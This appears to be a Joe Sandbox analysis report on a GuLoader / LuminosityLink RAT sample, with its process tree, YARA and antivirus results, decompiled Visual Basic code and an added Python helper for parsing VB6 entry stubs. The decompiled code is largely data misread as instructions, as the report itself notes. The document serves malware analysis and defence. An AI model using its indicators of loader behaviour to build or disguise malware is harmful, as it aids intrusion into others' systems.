                                MD5 hash: 6AFAE79556E125202DCF1D3FE74A3638
                                Has administrator privileges: true
                                Programmed in: .Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_LuminosityLink, Description: Yara detected LuminosityLink RAT, Source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation: low

                                General

                                Start time: 09:17:26
                                Start date: 17/09/2020
                                Path: C:\Windows\System32\conhost.exe
                                Wow64 process (32bit): false
                                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase: 0x7ff6b6340000
                                File size: 822272 bytes
                                MD5 hash: C221707E5CE93515AC87507E19181E2A
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Reputation: moderate

                                General

                                Start time: 09:17:34
                                Start date: 17/09/2020
                                Path: C:\ProgramData\782401\anibtcent.exe.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\ProgramData\782401\anibtcent.exe.exe'
                                Imagebase: 0x850000
                                File size: 53248 bytes
                                MD5 hash: 6AFAE79556E125202DCF1D3FE74A3638
                                Has administrator privileges: true
                                Programmed in: .Net C# or VB.NET
                                Antivirus matches:
                                • Detection: 0%, Virustotal
                                • Detection: 0%, Metadefender
                                • Detection: 0%, ReversingLabs
                                Reputation: low

                                General

                                Start time: 09:17:35
                                Start date: 17/09/2020
                                Path: C:\Windows\System32\conhost.exe
                                Wow64 process (32bit): false
                                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase: 0x7ff6b6340000
                                File size: 822272 bytes
                                MD5 hash: C221707E5CE93515AC87507E19181E2A
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Reputation: moderate

                                General

                                Start time: 09:17:39
                                Start date: 17/09/2020
                                Path: C:\Users\user\Hustankesgy3\demisphereklediskene.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
                                Imagebase: 0x400000
                                File size: 77824 bytes
                                MD5 hash: 01A54F73856CFB74A3BBBA47BCEC227B
                                Has administrator privileges: false
                                Programmed in: Visual Basic
                                Antivirus matches:
                                • Detection: 21%, Virustotal
                                • Detection: 19%, ReversingLabs
                                Reputation: low

                                General

                                Start time: 09:17:43
                                Start date: 17/09/2020
                                Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
                                Imagebase: 0x860000
                                File size: 53248 bytes
                                MD5 hash: 6AFAE79556E125202DCF1D3FE74A3638
                                Has administrator privileges: false
                                Programmed in: .Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Author: Joe Security
                                Reputation: low

                                General

                                Start time: 09:17:43
                                Start date: 17/09/2020
                                Path: C:\Windows\System32\conhost.exe
                                Wow64 process (32bit): false
                                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase: 0x7ff6b6340000
                                File size: 822272 bytes
                                MD5 hash: C221707E5CE93515AC87507E19181E2A
                                Has administrator privileges: false
                                Programmed in: C, C++ or other language
                                Reputation: moderate

                                General

                                Start time: 09:17:47
                                Start date: 17/09/2020
                                Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe'
                                Imagebase: 0x330000
                                File size: 53248 bytes
                                MD5 hash: 6AFAE79556E125202DCF1D3FE74A3638
                                Has administrator privileges: false
                                Programmed in: .Net C# or VB.NET
                                Reputation: low

                                General

                                Start time: 09:17:48
                                Start date: 17/09/2020
                                Path: C:\Windows\System32\conhost.exe
                                Wow64 process (32bit): false
                                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase: 0x7ff6b6340000
                                File size: 822272 bytes
                                MD5 hash: C221707E5CE93515AC87507E19181E2A
                                Has administrator privileges: false
                                Programmed in: C, C++ or other language
                                Reputation: moderate

                                General

                                Start time: 09:17:55
                                Start date: 17/09/2020
                                Path: C:\Users\user\Hustankesgy3\demisphereklediskene.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
                                Imagebase: 0x400000
                                File size: 77824 bytes
                                MD5 hash: 01A54F73856CFB74A3BBBA47BCEC227B
                                Has administrator privileges: false
                                Programmed in: Visual Basic
                                Reputation: low

                                Disassembly

                                Code Analysis


                                  Execution Graph

                                  Execution Coverage: 2.9%
                                  Dynamic/Decrypted Code Coverage: 8.7%
                                  Signature Coverage: 0%
                                  Total number of Nodes: 23
                                  Total number of Limit Nodes: 5

                                  Graph

                                  [Execution graph: 23 nodes, 5 limit nodes; entry at 0x4105e4 (E004105E4), which calls __vbaChkstk, __vbaNew2, __vbaHresultCheckObj, __vbaStrMove, __vbaFreeObj, __vbaLateIdCallLd, __vbaI4Var and __vbaFreeVar, then continues into 0x4107ae (E004107AE) and the __vbaFreeStr cleanup at 0x410765; a separate node at 0x401198 calls ordinal #100.]

                                  Executed Functions

                                  Control-flow Graph

                                  C-Code - Quality: 60%
                                  			E004105E4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				void* _v28;
                                  				void* _v32;
                                  				intOrPtr _v36;
                                  				signed int _v40;
                                  				char _v44;
                                  				char _v60;
                                  				signed int _v64;
                                  				signed int _v68;
                                  				intOrPtr* _v72;
                                  				signed int _v76;
                                  				signed int _v88;
                                  				intOrPtr* _v92;
                                  				signed int _v96;
                                  				signed int _v100;
                                  				signed int _v104;
                                  				signed int _t78;
                                  				signed int _t83;
                                  				signed int _t88;
                                  				char* _t89;
                                  				void* _t90;
                                  				void* _t101;
                                  				void* _t103;
                                  				intOrPtr _t104;
                                  
                                  				_t100 = __esi;
                                  				_t99 = __edi;
                                  				_t91 = __ebx;
                                  				_t104 = _t103 - 0xc;
                                  				 *[fs:0x0] = _t104;
                                  				L004010C0();
                                  				_v16 = _t104;
                                  				_v12 = E00401098;
                                  				_v8 = _a4 & 0x00000001;
                                  				_a4 = _a4 & 0x000000fe;
                                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x50,  *[fs:0x0], 0x4010c6, _t101);
                                  				if( *0x411594 != 0) {
                                  					_v92 = 0x411594;
                                  				} else {
                                  					_push(0x411594);
                                  					_push(0x402090);
                                  					L00401174();
                                  					_v92 = 0x411594;
                                  				}
                                  				_v64 =  *_v92;
                                  				_t78 =  *((intOrPtr*)( *_v64 + 0x14))(_v64,  &_v44);
                                  				asm("fclex");
                                  				_v68 = _t78;
                                  				if(_v68 >= 0) {
                                  					_v96 = _v96 & 0x00000000;
                                  				} else {
                                  					_push(0x14);
                                  					_push(0x402080);
                                  					_push(_v64);
                                  					_push(_v68);
                                  					L0040116E();
                                  					_v96 = _t78;
                                  				}
                                  				_v72 = _v44;
                                  				_t83 =  *((intOrPtr*)( *_v72 + 0x60))(_v72,  &_v40);
                                  				asm("fclex");
                                  				_v76 = _t83;
                                  				if(_v76 >= 0) {
                                  					_v100 = _v100 & 0x00000000;
                                  				} else {
                                  					_push(0x60);
                                  					_push(0x4020a0);
                                  					_push(_v72);
                                  					_push(_v76);
                                  					L0040116E();
                                  					_v100 = _t83;
                                  				}
                                  				_v88 = _v40;
                                  				_v40 = _v40 & 0x00000000;
                                  				L0040117A();
                                  				L00401168();
                                  				_t88 =  *((intOrPtr*)( *_a4 + 0x288))(_a4,  &_v44);
                                  				asm("fclex");
                                  				_v64 = _t88;
                                  				if(_v64 >= 0) {
                                  					_v104 = _v104 & 0x00000000;
                                  				} else {
                                  					_push(0x288);
                                  					_push(0x401f54);
                                  					_push(_a4);
                                  					_push(_v64);
                                  					L0040116E();
                                  					_v104 = _t88;
                                  				}
                                  				_push(0);
                                  				_push(0);
                                  				_push(_v44);
                                  				_t89 =  &_v60;
                                  				_push(_t89);
                                  				L0040115C();
                                  				_push(_t89);
                                  				L00401162();
                                  				_v36 = _t89;
                                  				L00401168();
                                  				L00401156(); // executed
                                  				_t90 = E004107AE(_t91,  &_v60, _t99, _t100); // executed
                                  				_v8 = 0;
                                  				_push(E0041078F);
                                  				L00401150();
                                  				L00401150();
                                  				return _t90;
                                  			}

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004010C6), ref: 00410600
                                  • __vbaNew2.MSVBVM60(00402090,00411594,?,?,?,?,004010C6), ref: 00410641
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402080,00000014), ref: 00410685
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004020A0,00000060), ref: 004106C0
                                  • __vbaStrMove.MSVBVM60(00000000,?,004020A0,00000060), ref: 004106DE
                                  • __vbaFreeObj.MSVBVM60(00000000,?,004020A0,00000060), ref: 004106E6
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401098,00401F54,00000288), ref: 00410718
                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00410731
                                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,004010C6), ref: 0041073A
                                  • __vbaFreeObj.MSVBVM60(00000000,?,?,?,004010C6), ref: 00410745
                                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,004010C6), ref: 0041074D
                                  • __vbaFreeStr.MSVBVM60(0041078F,00000000,?,?,?,004010C6), ref: 00410781
                                  • __vbaFreeStr.MSVBVM60(0041078F,00000000,?,?,?,004010C6), ref: 00410789
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.24036576698.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.24036522568.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000003.00000002.24036687091.0000000000411000.00000004.00020000.sdmp
                                  • Associated: 00000003.00000002.24036753540.0000000000413000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_New Inquiry 903838737777721102029393003938.jbxd
                                  Similarity
                                  • API ID: __vba$Free$CheckHresult$CallChkstkLateMoveNew2
                                  • String ID:
                                  • API String ID: 1245641248-0
                                  • Opcode ID: 9a465e81a76bde142842b4f258309277150979447a63d957fb85e618464083e3
                                  • Instruction ID: 872232f5f29706813e3bb7c0173e2787999fc991f4768f39e88a0e5453f75b58
                                  • Opcode Fuzzy Hash: 9a465e81a76bde142842b4f258309277150979447a63d957fb85e618464083e3
                                  • Instruction Fuzzy Hash: F651C275900208EFCB14EFA5C949BDDBBB5AF08704F10402AF205BB2A1D779A995DF58
                                  Uniqueness
                                  • Uniqueness Score: 100.00%

                                  Control-flow Graph (the rendered graph is not reproduced; in the original, nodes are coloured Executed or Not Executed)
                                  • Node 20: 0x401198-0x4011b6 (#100), edges 20->21 and 20->22
                                  • Node 21: 0x401201
                                  • Node 22: 0x4011b8
                                  C-Code - Quality: 84%
                                  Caveat: only the first two statements of _entry_ below are real instructions. The push of a pointer to the VB project header (whose leading bytes are the signature "VB5!6&*": magic "VB5!", runtime build word 0x2636 shown as "6&", and the first character "*" of the language DLL name) and the call to L00401192, the six-byte jmp [MSVBVM60!ThunRTMain] thunk that VB6 places immediately before its entry point, form the standard VB6 entry stub. ThunRTMain does not return, so the decompiler continued past the call into the zero padding and the header data that follow it: the repeated *eax = *eax + eax statements (00 00 bytes), the invalid, in/out and outsd opcodes and the control flow shown after L00401192() are decompiled data, not program logic, and the 84% quality figure should be read with that in mind.
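                                  The push/call pair at the top of the _entry_ listing that follows is the stub every VB6 executable starts with. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it decodes that stub from a flat buffer already mapped at its image base (for instance a memory dump), follows the pushed pointer, checks the "VB5!" magic and reports where the real code ends and the header data begins. The image base, the thunk/entry/header addresses in the constructed test image and the VBHeader field offsets used (the commonly published layout: magic at 0, runtime build at 4, szLangDll at 6, lpSubMain at 0x2C, lpProjectData at 0x30) are assumptions, not facts taken from the report.

```python
"""Recognise the VB6 entry stub (push VBHeader; call ThunRTMain) and read
the header it points at.  Added example, not code from the Joe Sandbox
report or from the sample; it works on a flat buffer that is already
mapped at its image base (for instance a memory dump)."""
import struct

IMAGE_BASE = 0x400000  # assumed image base; matches the dump offset on the page
VB_MAGIC = b"VB5!"     # szVbMagic, first four bytes of the VBHeader
STUB_LEN = 10          # push imm32 (5 bytes) + call rel32 (5 bytes)


def parse_vb6_entry(image: bytes, base: int, entry_va: int) -> dict:
    """Decode `68 imm32 / E8 rel32` at entry_va and return the VBHeader
    fields the pushed pointer references.  Field offsets follow the
    commonly published VBHeader layout (an assumption, not taken from
    the report): magic @0, wRuntimeBuild @4, szLangDll[14] @6,
    lpSubMain @0x2C, lpProjectData @0x30."""
    off = entry_va - base
    if off < 0 or off + STUB_LEN > len(image):
        raise ValueError("entry point outside the buffer")
    if image[off] != 0x68 or image[off + 5] != 0xE8:
        raise ValueError("entry is not `push imm32; call rel32`")
    header_va = struct.unpack_from("<I", image, off + 1)[0]
    rel32 = struct.unpack_from("<i", image, off + 6)[0]
    thunk_va = entry_va + STUB_LEN + rel32  # normally jmp [MSVBVM60!ThunRTMain]
    hoff = header_va - base
    if hoff < 0 or hoff + 0x34 > len(image) or image[hoff:hoff + 4] != VB_MAGIC:
        raise ValueError("pushed pointer does not reference a VB5! header")
    build = struct.unpack_from("<H", image, hoff + 4)[0]
    lang_dll = image[hoff + 6:hoff + 20].split(b"\0", 1)[0]
    sub_main, project_data = struct.unpack_from("<II", image, hoff + 0x2C)
    return {
        "header_va": header_va,
        "thunk_va": thunk_va,
        # ThunRTMain never returns: bytes from here on are data, which is
        # what a decompiler turns into `*eax = *eax + eax` style noise.
        "code_end_va": entry_va + STUB_LEN,
        # magic + build word + start of szLangDll is the "VB5!6&*" string
        "signature": (VB_MAGIC + struct.pack("<H", build) + lang_dll).decode("ascii"),
        "runtime_build": build,
        "sub_main_va": sub_main,  # 0 when the project starts from a form
        "project_data_va": project_data,
    }


def is_vb6_stub(image: bytes, base: int, entry_va: int) -> bool:
    """True when the entry point is a VB6 stub pointing at a VB5! header."""
    try:
        parse_vb6_entry(image, base, entry_va)
    except ValueError:
        return False
    return True


def build_sample_image() -> bytes:
    """Constructed test image (not bytes from the analysed sample): thunk at
    0x401192, entry at 0x401198 as in the report's CFG, header at 0x401200."""
    img = bytearray(0x2000)
    thunk, entry, header = 0x401192, 0x401198, 0x401200
    t = thunk - IMAGE_BASE
    img[t:t + 6] = b"\xFF\x25" + struct.pack("<I", 0x401800)  # jmp dword ptr [IAT slot]
    e = entry - IMAGE_BASE
    img[e:e + 5] = b"\x68" + struct.pack("<I", header)         # push offset VBHeader
    img[e + 5:e + 10] = b"\xE8" + struct.pack("<i", thunk - (entry + STUB_LEN))  # call thunk
    hdr = bytearray(0x68)                                       # zero padding precedes it
    hdr[0:4] = VB_MAGIC
    struct.pack_into("<H", hdr, 4, 0x2636)                      # "6&"
    hdr[6] = ord("*")                                           # szLangDll = "*"
    struct.pack_into("<II", hdr, 0x2C, 0, 0x401400)             # lpSubMain, lpProjectData
    h = header - IMAGE_BASE
    img[h:h + len(hdr)] = hdr
    return bytes(img)


if __name__ == "__main__":
    info = parse_vb6_entry(build_sample_image(), IMAGE_BASE, 0x401198)
    for k, v in info.items():
        print(f"{k:16} {v:#x}" if isinstance(v, int) else f"{k:16} {v}")
```

                                  On a real dump, feed the mapped bytes, the base the dump was taken at and the PE entry point; code_end_va is the address after which a decompiler should not be trusted, and the sub_main / project_data pointers are where analysis of the VB code proper starts.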
                                  			_entry_(signed int __eax, signed int __ebx, intOrPtr* __ecx, intOrPtr* __edx, intOrPtr* __edi, signed int __esi, intOrPtr* _a4, intOrPtr _a68, signed int _a110) {
                                  				intOrPtr _v8;
                                  				signed int _v28;
                                  				void* _v32;
                                  				intOrPtr _v36;
                                  				signed int _v40;
                                  				char _v44;
                                  				intOrPtr _v48;
                                  				char _v60;
                                  				signed int _v64;
                                  				signed int _v68;
                                  				intOrPtr* _v72;
                                  				signed int _v76;
                                  				signed int _v88;
                                  				signed int* _v92;
                                  				signed int _v96;
                                  				signed int _v100;
                                  				signed int _v104;
                                  				intOrPtr* _t232;
                                  				intOrPtr* _t233;
                                  				signed char _t234;
                                  				signed char _t235;
                                  				signed int _t236;
                                  				signed int _t237;
                                  				intOrPtr* _t238;
                                  				intOrPtr* _t239;
                                  				intOrPtr* _t240;
                                  				intOrPtr* _t241;
                                  				intOrPtr* _t242;
                                  				void* _t243;
                                  				intOrPtr* _t244;
                                  				intOrPtr* _t245;
                                  				signed int _t246;
                                  				intOrPtr* _t247;
                                  				intOrPtr* _t248;
                                  				signed int _t249;
                                  				signed char _t250;
                                  				signed char _t252;
                                  				intOrPtr* _t254;
                                  				intOrPtr* _t255;
                                  				signed char _t256;
                                  				signed int _t257;
                                  				intOrPtr* _t259;
                                  				intOrPtr* _t260;
                                  				intOrPtr* _t261;
                                  				signed char _t263;
                                  				intOrPtr* _t264;
                                  				intOrPtr* _t265;
                                  				void* _t267;
                                  				signed char _t268;
                                  				intOrPtr* _t270;
                                  				intOrPtr* _t271;
                                  				intOrPtr* _t272;
                                  				signed int _t273;
                                  				intOrPtr* _t276;
                                  				intOrPtr* _t277;
                                  				intOrPtr* _t278;
                                  				intOrPtr* _t280;
                                  				intOrPtr* _t281;
                                  				intOrPtr* _t282;
                                  				signed char _t284;
                                  				signed char _t285;
                                  				intOrPtr* _t286;
                                  				intOrPtr* _t287;
                                  				intOrPtr* _t288;
                                  				intOrPtr* _t290;
                                  				intOrPtr* _t291;
                                  				void* _t292;
                                  				void* _t293;
                                  				intOrPtr* _t294;
                                  				void* _t295;
                                  				void* _t296;
                                  				intOrPtr* _t297;
                                  				intOrPtr* _t298;
                                  				signed int _t313;
                                  				signed int _t318;
                                  				signed int _t323;
                                  				char* _t324;
                                  				void* _t325;
                                  				intOrPtr* _t326;
                                  				intOrPtr* _t327;
                                  				intOrPtr* _t328;
                                  				signed char _t329;
                                  				signed char _t330;
                                  				intOrPtr* _t333;
                                  				intOrPtr* _t334;
                                  				void* _t335;
                                  				intOrPtr* _t337;
                                  				signed int _t338;
                                  				signed char _t340;
                                  				signed int _t341;
                                  				intOrPtr* _t342;
                                  				signed char _t344;
                                  				intOrPtr* _t345;
                                  				intOrPtr* _t347;
                                  				signed int _t351;
                                  				void* _t354;
                                  				signed int _t356;
                                  				signed int _t358;
                                  				signed char _t359;
                                  				void* _t360;
                                  				intOrPtr* _t361;
                                  				void* _t362;
                                  				intOrPtr* _t363;
                                  				intOrPtr* _t364;
                                  				intOrPtr* _t365;
                                  				signed char _t366;
                                  				signed char _t367;
                                  				intOrPtr* _t368;
                                  				intOrPtr* _t369;
                                  				void* _t376;
                                  				intOrPtr* _t377;
                                  				signed int* _t379;
                                  				signed int* _t385;
                                  				signed int _t386;
                                  				signed int _t387;
                                  				void* _t389;
                                  				void* _t391;
                                  				signed int* _t392;
                                  				void* _t393;
                                  				void* _t394;
                                  				intOrPtr _t395;
                                  				void* _t398;
                                  				intOrPtr _t399;
                                  
                                  				_t386 = __esi;
                                  				_t378 = __edx;
                                  				_t361 = __ecx;
                                  				_push("VB5!6&*"); // executed
                                  				L00401192(); // executed
                                  				 *__eax =  *__eax + __eax;
                                  				 *__eax =  *__eax + __eax;
                                  				 *__eax =  *__eax + __eax;
                                  				 *__eax =  *__eax ^ __eax;
                                  				 *__eax =  *__eax + __eax;
                                  				_t232 = __eax - 1;
                                  				 *_t232 =  *_t232 + _t232;
                                  				 *_t232 =  *_t232 + _t232;
                                  				 *_t232 =  *_t232 + _t232;
                                  				 *__edi =  *__edi + __ecx;
                                  				_t399 =  *__edi;
                                  				asm("bswap esi");
                                  				if(_t399 <= 0) {
                                  					asm("pushad");
                                  					asm("invalid");
                                  					asm("salc");
                                  					__eflags =  *((char*)(__ebx + _t389)) - 0x17;
                                  					__eflags = _t232 - 0x2b;
                                  					_pop(ss);
                                  					asm("in eax, 0xba");
                                  					asm("adc cl, [edi-0x2f]");
                                  					asm("out dx, al");
                                  					asm("ror byte [0x3a17e6d3], cl");
                                  					_t385 = __edi - 1;
                                  					asm("lodsd");
                                  					_t233 = _t232;
                                  					asm("stosb");
                                  					 *((intOrPtr*)(_t233 - 0x2d)) =  *((intOrPtr*)(_t233 - 0x2d)) + _t233;
                                  					_t234 = __ebx ^  *(__ecx - 0x48ee309a);
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					 *_t234 =  *_t234 + _t234;
                                  					goto 0;
                                  					 *_t234 =  *_t234 + _t234;
                                  					_t235 = _t234 |  *_t234;
                                  					_t351 = _t233 - 1;
                                  					__eflags = _t351;
                                  					asm("popad");
                                  					if(_t351 < 0) {
                                  						L9:
                                  						_pop(es);
                                  						_t20 =  &(_t385[0x1c]);
                                  						 *_t20 = _t385[0x1c] + _t361;
                                  						__eflags =  *_t20;
                                  						if( *_t20 == 0) {
                                  							goto L18;
                                  						} else {
                                  							asm("outsd");
                                  							asm("outsb");
                                  							_t337 = (_t235 ^  *_t235) + 0xe100438;
                                  							_t385 = 0x1201ef04;
                                  							 *_t337 =  *_t337 + _t337;
                                  							 *_t351 =  *_t351 + 1;
                                  							 *_t337 =  *_t337 - _t337;
                                  							 *_t337 =  *_t337 + _t337;
                                  							_t236 = _t337 +  *0x1201ef04;
                                  							 *0x1201EF74 =  *0x1201EF74 + _t361;
                                  							__eflags =  *0x1201EF74;
                                  							if( *0x1201EF74 == 0) {
                                  								goto L20;
                                  							} else {
                                  								asm("outsd");
                                  								asm("outsb");
                                  								 *_t236 =  *_t236 ^ _t236;
                                  								_push(es);
                                  								 *0x1201ef04 =  *0x1201ef04 + _t236;
                                  								 *0x1201EF74 =  *0x1201EF74 + _t361;
                                  								__eflags =  *0x1201EF74;
                                  								if( *0x1201EF74 != 0) {
                                  									asm("outsd");
                                  									asm("outsb");
                                  									 *_t236 =  *_t236 ^ _t236;
                                  									_t338 = _t236 + 0xd980960;
                                  									__eflags = _t338;
                                  									_t385 = 0x1201ef04;
                                  									goto L13;
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						asm("outsd");
                                  						asm("o16 gs insb");
                                  						 *_t235 =  *_t235 ^ _t235;
                                  						_t338 = _t235 | 0x55000701;
                                  						_t398 = _t391 + 1;
                                  						_t360 = _t351 - 1;
                                  						_push(__edx);
                                  						_pop(_t377);
                                  						_push(_t360);
                                  						_push(_t398);
                                  						 *_t377 =  *_t377 + _t360;
                                  						 *_t338 =  *_t338 + _t338;
                                  						_t378 = __edx + 1;
                                  						 *((intOrPtr*)(_t385 + _t338)) =  *((intOrPtr*)(_t385 + _t338)) + _t338;
                                  						_a68 = _a68 + _t378;
                                  						_t351 = _t360 - 1;
                                  						_t361 = _t378;
                                  						_push(_t351);
                                  						_push(_t398);
                                  						 *0x1aca =  *0x1aca + _t378;
                                  						asm("aad 0x1a");
                                  						 *_t338 =  *_t338 + _t338;
                                  						asm("movsb");
                                  						asm("adc al, [eax]");
                                  						 *((intOrPtr*)(_t351 + 0x12)) =  *((intOrPtr*)(_t351 + 0x12)) + _t338;
                                  						 *_t338 =  *_t338 + _t338;
                                  						_t391 = _t398 + 1;
                                  						 *((intOrPtr*)(__esi + 3)) =  *((intOrPtr*)(__esi + 3)) + _t338;
                                  						 *__ecx =  *__ecx + 1;
                                  						 *_t338 =  *_t338 - _t338;
                                  						 *_t338 =  *_t338 + _t338;
                                  						 *_t385 =  *_t385 + _t338;
                                  						_t14 =  &(_t385[0x1c]);
                                  						 *_t14 = _t385[0x1c] + __ecx;
                                  						__eflags =  *_t14;
                                  						if( *_t14 == 0) {
                                  							L13:
                                  							asm("out dx, eax");
                                  							 *_t378 =  *_t378 + _t378;
                                  							 *_t351 =  *_t351 + 1;
                                  							_t340 = _t338 +  *_t338 & 0x00000000;
                                  							 *_t340 =  *_t340 + _t340;
                                  							_t341 = _t340 + 5;
                                  							__eflags = _t341;
                                  							goto L14;
                                  						} else {
                                  							asm("outsd");
                                  							asm("outsb");
                                  							_t341 = _t338 ^  *_t338;
                                  							_push(es);
                                  							 *_t385 =  *_t385 + _t341;
                                  							_t16 =  &(_t385[0x1c]);
                                  							 *_t16 = _t385[0x1c] + __ecx;
                                  							__eflags =  *_t16;
                                  							if( *_t16 == 0) {
                                  								L14:
                                  								_t236 = 0x78655400 + _t341;
                                  								__eflags = _t236;
                                  								if(_t236 == 0) {
                                  									goto L19;
                                  								} else {
                                  									 *_t378 =  *_t378 + _t236;
                                  									_t342 = _t236 + 0x78;
                                  									 *_t342 =  *_t342 + _t361;
                                  									_t236 = _t342 + 0x01ef1167 |  *0x78655400;
                                  									__eflags = _t236;
                                  									if(_t236 != 0) {
                                  										 *_t378 =  *_t378 + _t378;
                                  										_t344 = _t236 +  *_t236;
                                  										__eflags = _t344;
                                  										goto L17;
                                  									}
                                  								}
                                  								goto L21;
                                  							} else {
                                  								asm("outsd");
                                  								asm("outsb");
                                  								_t347 = (_t341 ^  *_t341) + 0xe880d98;
                                  								_t385 = 0x1201ef04;
                                  								 *_t347 =  *_t347 + _t347;
                                  								 *_t351 =  *_t351 + 1;
                                  								 *_t347 =  *_t347 - _t347;
                                  								 *_t347 =  *_t347 + _t347;
                                  								_t344 = _t347 +  *0x1201ef04;
                                  								 *0x1201EF74 =  *0x1201EF74 + __ecx;
                                  								__eflags =  *0x1201EF74;
                                  								if( *0x1201EF74 == 0) {
                                  									L17:
                                  									_t351 = _t351 + _t351;
                                  									_t345 = _t344 +  *((intOrPtr*)(_t344 + _t344));
                                  									_push(es);
                                  									 *_t345 =  *_t345 + _t345;
                                  									 *((intOrPtr*)(_t345 + 0x21)) =  *((intOrPtr*)(_t345 + 0x21)) + _t345;
                                  									_t235 = _t345 + 1;
                                  									__eflags = _t235;
                                  									L18:
                                  									 *_t361 =  *_t361 + _t235;
                                  									 *_t378 =  *_t378 + _t235;
                                  									_t236 = _t235 + _t351;
                                  									asm("sbb al, 0x40");
                                  									 *_t236 =  *_t236 + _t236;
                                  									 *_t236 =  *_t236 + _t236;
                                  									_t351 = _t351 + _t351;
                                  									asm("invalid");
                                  									L19:
                                  									asm("invalid");
                                  									asm("invalid");
                                  									asm("invalid");
                                  									 *_t236 =  *_t236 + _t236;
                                  									 *_t236 =  *_t236 + _t236;
                                  									asm("sbb eax, 0x101c0040");
                                  									L20:
                                  									asm("sbb al, 0x10");
                                  									_t361 = _t361 + 1;
                                  									 *_t236 =  *_t236 + _t236;
                                  									__eflags =  *_t236;
                                  									L21:
                                  									 *_t236 =  *_t236 + _t236;
                                  									_t237 = _t236 + _t351;
                                  									__eflags = _t237;
                                  									asm("outsd");
                                  									if (_t237 >= 0) goto L22;
                                  								} else {
                                  									asm("outsd");
                                  									asm("outsb");
                                  									_t235 = _t344 ^  *_t344;
                                  									_push(es);
                                  									 *0x1201ef04 =  *0x1201ef04 + _t235;
                                  									__eflags =  *0x1201ef04;
                                  									goto L9;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					 *_t237 =  *_t237 + _t237;
                                  					 *_t237 =  *_t237 + _t237;
                                  					 *_t237 =  *_t237 + _t237;
                                  					 *_t237 =  *_t237 + _t237;
                                  					 *_t237 =  *_t237 + _t237;
                                  					 *_t237 =  *_t237 + _t237;
                                  					__eflags =  *_t237;
                                  					if( *_t237 != 0) {
                                  						_t335 = _t237 + 1;
                                  						 *_t361 =  *_t361 + _t335;
                                  						 *_t351 =  *_t351 + _t335;
                                  						_t237 = _t335 + _t351;
                                  						asm("sbb al, 0x40");
                                  						 *_t237 =  *_t237 + _t237;
                                  						 *_t237 =  *_t237 + _t237;
                                  						_t351 = _t351 + _t351;
                                  						asm("invalid");
                                  						asm("invalid");
                                  					}
                                  					asm("invalid");
                                  					 *_t237 =  *_t237 + 1;
                                  					 *_t237 =  *_t237 + _t237;
                                  					_t238 = _t237 + _t237;
                                  					asm("sbb eax, 0x10400040");
                                  					_t362 = _t361 + 1;
                                  					 *_t238 =  *_t238 + _t238;
                                  					 *_t238 =  *_t238 + _t238;
                                  					 *((intOrPtr*)(_t238 + 0x7e2a)) =  *((intOrPtr*)(_t238 + 0x7e2a)) + _t238;
                                  					 *_t238 =  *_t238 + _t238;
                                  					 *_t238 =  *_t238 + _t238;
                                  					 *_t238 =  *_t238 + _t238;
                                  					 *_t238 =  *_t238 + _t238;
                                  					 *_t238 =  *_t238 + _t238;
                                  					 *((intOrPtr*)(_t351 + _t378 + 0x10040)) =  *((intOrPtr*)(_t351 + _t378 + 0x10040)) + _t362;
                                  					_t239 = _t238;
                                  					asm("fcomp qword [eax+eax*2]");
